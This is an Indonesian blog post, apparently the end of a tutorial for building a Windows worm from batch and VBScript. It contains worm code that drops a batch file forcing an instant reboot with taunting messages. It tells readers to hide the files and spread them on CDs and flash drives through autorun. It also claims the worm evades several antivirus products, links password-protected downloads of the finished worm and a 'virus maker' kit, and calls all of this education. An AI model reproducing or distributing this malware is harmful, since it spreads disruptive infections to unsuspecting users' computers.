start “” “disk.vbs” 2> nul
echo @echo off >> “%USERPROFILE%\Desktop\fuCkerw0rm.bat”
echo shutdown -r -t 00 -c “fuCker w0rm deteCted!” >> “%USERPROFILE%\Desktop\fuCkerw0rm.bat”
echo echo 0wned by fuCker w0rm! 0n %DATE% at%TIME% >> “%USERPROFILE%\Desktop\fuCkerw0rm.bat”
echo @exit >> “%USERPROFILE%\Desktop\fuCkerw0rm.bat”
set usac=
start “%USERPROFILE%\Desktop\fuCkerw0rm.bat” 2> nul
echo x=msgbox(“0wned!”,vbCritical or vbOkOnly,”fuCker w0rm”) >> “w0rm.vbs”
start “” “w0rm.vbs” 2> nul
goto end
)
endlocal
:end
cls
exit
===========================================================================
NB: file-file tersebut harus dalam 1 direktori, lalu seleksi file-file tsb klik kanan PROPERTIES beri tanda check pada HIDDEN dan READ-ONLY.
Copy file-file tersebut ke CD atau FlashDisk dalam Folder Utama Yaw
Truz Nikmatin Dech Efeknya….
Virus Worm ini memang bukan murni dari pemikiran saya sendiri
karena meniru kode-nya virus Rangga-Zay. Tapi yang ini lebih bagus karena tidak terdeteksi pakai PCMAV RC15, CLAMAV, dan AVAST. Itung-itung ini buat Anda tahu kalau membuat virus/worm tidak perlu membeli software bajakan. Pakai Notepad (dari Windows Original) juga bisa.
Ini aku setakan File2 Yang Sudah Jadi So G perlu Repot2 Copy Paste Tinggal Download Doang
DOWNLOAD bosgentongs.exe.vbs – bosgentongs.bat – autorun.inf – antibosgentongs.inf <via 4share>
password: bosgentongs
Kalau ini masih dirasa sulit buat teman-teman ada satu lagi cara yaitu dengan virus maker hanya dengan memberikan tanda chek kemudian klik ok,sudah jadi, bisa didownload disini:
http://www.ziddu.com/download/8687881/TeraBITVirusMakerv2.8.zip.html
Penulis tidak bertanggung jawab atas segala
kerusakan yang ditimbulkan, penulis hanya membuat artikel ini bertujuan untuk pengetahuan, wawasan dan pendidikan saja.


SELAMAT MENCOBA.

Tidak ada komentar:

Posting Komentar